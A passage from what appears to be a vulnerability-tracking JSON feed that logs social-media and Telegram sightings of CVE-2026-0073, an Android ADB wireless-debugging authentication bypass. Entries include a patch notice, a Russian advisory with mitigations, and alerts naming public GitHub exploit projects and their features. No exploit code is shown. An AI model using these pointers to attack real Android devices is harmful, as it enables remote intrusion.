"2026-05-07T16:06:43.926210Z"}, {"uuid": "a086f7ac-a877-4beb-9112-26d78d80903a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/grapheneos.org/post/3mlcj47c6ws2i", "content": "CVE-2026-0073 is a Critical severity Remote Code Execution (RCE) vulnerability included as the only vulnerability fixed in the May 2026 Android Security Bulletin. GrapheneOS first shipped the patch in our 2026030501 security preview release on March 5th. It also isn't nearly as severe as it sounds.", "creation_timestamp": "2026-05-08T00:49:19.644453Z"}, {"uuid": "defadccf-3c2e-42d8-aac3-92b4f9777d75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "Telegram/vzTACITSxs978bepVF2fAbJ-LA46ia7V8AwPJb289jK3goA", "content": "", "creation_timestamp": "2026-05-07T21:00:05.000000Z"}, {"uuid": "dca37827-44ce-4118-bde1-347c4cf715f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "Telegram/dsiEA15uidVU6KDez4EkzkpuPE2tuEKKJLQ-eeC4Q0mRqFk", "content": "", "creation_timestamp": "2026-05-07T09:00:04.000000Z"}, {"uuid": "999fd7c6-a5a1-4f17-8a9c-8d4f3b30a5be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "Telegram/ejAET7Wd0n1V5uqKctP5d-vJmqb8O4j5F4lTKyPXLyKbJrU", "content": "", "creation_timestamp": "2026-05-06T03:00:05.000000Z"}, {"uuid": "a3237290-4486-436e-a529-c94de59942af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "Telegram/N1Jo8qZWaWReiL_t-N5l6uzcgIVKcO6O8PdoiYgN9aP0HPY", "content": "", "creation_timestamp": "2026-05-07T03:00:06.000000Z"}, {"uuid": "2659adf9-3b53-4cef-b58a-e68679b55823", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "Telegram/qLnk1n5B0PR5yjep7bbwsMJyTwvCWVIASLg9mGkcsDxA1Jk", "content": "", "creation_timestamp": "2026-05-06T21:00:04.000000Z"}, {"uuid": "509593bb-727c-4e15-8c99-1336fed736aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://t.me/bdufstecru/3144", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u0438 adbd_tls_verify_cert() \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Android \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0430\u043c\u0438 \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u044b \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434\n\nBDU:2026-06426\nCVE-2026-0073\n\n\u041a\u043e\u043c\u043f\u0435\u043d\u0441\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u043c\u0435\u0440\u044b:\n- \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043a \u0441\u0435\u0442\u0438 Wi-Fi;\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u044d\u043a\u0440\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u043b\u044f \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c\u0443 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0443;\n- \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438\u0437 \u0432\u043d\u0435\u0448\u043d\u0438\u0445 \u0441\u0435\u0442\u0435\u0439 (\u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442);\n- \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u0434\u0435\u043c\u043e\u043d\u0430 Android Debug Bridge;\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u0447\u0430\u0441\u0442\u043d\u044b\u0445 \u0441\u0435\u0442\u0435\u0439 \u0434\u043b\u044f \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 (VPN).\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044f:\nhttps://source.android.com/docs/security/bulletin/2026/2026-05-01?hl=ru", "creation_timestamp": "2026-05-08T14:02:18.000000Z"}, {"uuid": "223122db-06de-4a0d-854d-ec60a40e12cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-0073", "type": "seen", "source": "https://bsky.app/profile/cyberveille-ch.bsky.social/post/3mle3zg3ed22x", "content": "\ud83d\udce2 CVE-2026-0073 : Bypass d'authentification critique dans ADB-over-TCP d'Android permettant une RCE\n\ud83d\udcdd ## \ud83d\udd0d Contexte\n\nPubli\u00e9 le 5 mai 2026 par BA\u2026\nhttps://cyberveille.ch/posts/2026-05-08-cve-2026-0073-bypass-d-authentification-critique-dans-adb-over-tcp-d-android-permettant-une-rce/ #ADB #Cyberveille", "creation_timestamp": "2026-05-08T16:00:29.007618Z"}, {"uuid": "1f1251b4-492a-44d1-8081-7038222baf6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlf77ax52d2i", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 202 interactions\nCVE-2026-0073: 79 interactions\nCVE-2026-41940: 66 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-0073: 66 interactions\nCVE-2026-43284: 61 interactions\nCVE-2026-7270: 32 interactions\n", "creation_timestamp": "2026-05-09T02:30:08.518609Z"}, {"uuid": "995711e6-6be1-41c8-b49d-dd691a816f04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mlkblzj6yt24", "content": "Zero-Click Shell: Public Exploit and PoC Disclosed for Android\u2019s Critical ADB Auth Bypass (CVE-2026-0073)", "creation_timestamp": "2026-05-11T02:56:18.558878Z"}, {"uuid": "d1da2ebc-3601-4bfd-9e40-e8764d9739f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/samsung-products-multiple-vulnerabilities_20260511", "content": "", "creation_timestamp": "2026-05-10T20:00:00.000000Z"}, {"uuid": "3dddd8d0-8603-4ed9-9e42-d54ba1efd926", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mlnvceilms26", "content": "CVE-2026-0073: The Zero-Click Android Apocalypse \u2013 PoC Exploit Grants Silent Remote Shell\u00a0Access\n\nIntroduction A catastrophic zero-click vulnerability (CVE-2026-0073) in Android\u2019s `adbd` daemon allows nearby attackers to gain full remote shell access without any victim interaction. This\u2026", "creation_timestamp": "2026-05-12T13:26:48.931288Z"}, {"uuid": "99e6b1d9-1ba8-4d85-b028-ed70b580c5d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "Telegram/O41s4ZacceniC-zmRdA20LKtlUfLN8dJaI2Rmc1hsAXigiA", "content": "", "creation_timestamp": "2026-05-13T21:00:04.000000Z"}, {"uuid": "995e9670-38ae-4366-b437-6d8ccbd6e7c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://t.me/cKure/16395", "content": "\u26a0\ufe0f\u26a0\ufe0f\u26a0\ufe0f\u26a0\ufe0f\u26a0\ufe0f\u26a0\ufe0f\nCVE-2026-0073: Critical Android Zero-Click, Zero-Day exploit in wireless debugging (if enabled) can allow adjacent hacker (in same network) to execute code as shell user.", "creation_timestamp": "2026-05-14T16:19:03.000000Z"}, {"uuid": "85ddc36e-9599-4dfd-bca8-8121e1801319", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://t.me/GithubRedTeam/84983", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-0073\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a 0xbinder\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 3 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-20 09:34:09\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nAn automated exploit for CVE-2026-0073 (Android ADB TLS Auth Bypass). Features a built-in mDNS/Zeroconf scanner to instantly discover randomized Wireless Debugging ports on Android 13+ and establishes a fully interactive raw PTY shell.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-20T10:00:04.000000Z"}, {"uuid": "e51ae280-b2a5-4cf7-b23b-9fed173e30ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "published-proof-of-concept", "source": "Telegram/LRuVHO_NRtLslMv_pxl3JYoJM5ygIHd_ktikilExPtpHxGM", "content": "", "creation_timestamp": "2026-05-20T15:00:07.000000Z"}, {"uuid": "9fa5e0f0-8490-4725-8e5f-a99c60901490", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://t.me/GithubRedTeam/85456", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #RCE #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-0073-ADBD-Bypass\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ridhinva\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-22 20:44:24\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nAndroid ADB Authentication Bypass - Wireless ADB RCE Scanner\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-22T21:05:18.000000Z"}, {"uuid": "b8b4f21c-6528-411a-a28e-f7aac950b98f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mmjn2rljmk27", "content": "\u300cAndroid\u300d\u306b\u8fd1\u63a5\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u7d4c\u7531\u306eRCE\u8106\u5f31\u6027 - PoC\u516c\u958b\u3082\n\nGoogle\u306f\u3001\u300cAndroid\u300d\u5411\u3051\u306b2026\u5e745\u6708\u306e\u6708\u4f8b\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30a2\u30c3\u30d7\u30c7\u30fc\u30c8\u3092\u516c\u958b\u3057\u305f\u3002\n\n\u73fe\u5730\u6642\u95932026\u5e745\u67084\u65e5\u306b\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30a2\u30c9\u30d0\u30a4\u30b6\u30ea\u3092\u516c\u958b\u3057\u3001Android\u30c7\u30d0\u30a4\u30b9\u5411\u3051\u306b\u30d1\u30c3\u30c1\u30ec\u30d9\u30eb\u300c2026-05-01\u300d\u3092\u30ea\u30ea\u30fc\u30b9\u3057\u305f\u3082\u306e\u3002\n\n\u4eca\u56de\u306e\u30a2\u30c3\u30d7\u30c7\u30fc\u30c8\u3067\u306f\u3001\u300cSystem\u300d\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8\u3067\u3042\u308b\u300cAndroid Debug Bridge\u300d\u306b\u78ba\u8a8d\u3055\u308c\u305f\u8106\u5f31\u6027\u300cCVE-2026-0073\u300d\u3078\u5bfe\u5fdc\u3057\u305f\u3002\n\n\u30ef\u30a4\u30a2\u30ec\u30b9\u306b\u3088\u308bADB\u76f8\u4e92\u8a8d\u8a3c\u3092\u30d0\u30a4\u30d1\u30b9\u3067\u304d\u3001\u8fd1\u63a5\u3057\u305f\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u304b\u3089\u30ea\u30e2\u30fc\u30c8\u3067\u30b3\u30fc\u30c9\u3092\u5b9f\u884c\u3059\u308b\u3053\u3068...", "creation_timestamp": "2026-05-23T14:13:56.771742Z"}, {"uuid": "dd03da94-05f5-436d-b2a0-7f377a8fb223", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "Telegram/hQ1BgqlandqZtiBEN_8bc-Jqb7FATWW_NqNwwco7cLj54NM", "content": "", "creation_timestamp": "2026-05-23T03:00:04.000000Z"}, {"uuid": "459b5aac-f3d3-43db-a71c-ddb290acff8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://t.me/GithubRedTeam/85809", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit #RCE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-0073-ZERO-CLICK\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a thakur2309\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-25 10:52:12\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nZERO-CLICK VUL - CVE-2026-0073 Android ADB Wireless Auth Bypass Exploit Framework. Multi-target zero-click RCE as shell user via TLS cert logic flaw in adbd. Targets Android 11+ devices pre-May 2026 patch with wireless debugging enabled. Features batch IP scanning, diagnostic commands, EC/Ed25519 key support, verbose debug mode & interactive wizard\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-25T11:00:04.000000Z"}, {"uuid": "9ed6927f-7207-4dcf-8ff6-0190b7036f50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "Telegram/p4pSz48sW8Fl1dqUeH21RBDMwtfRPHmaTBryFak7xdWuTDY", "content": "", "creation_timestamp": "2026-05-25T15:00:06.000000Z"}]}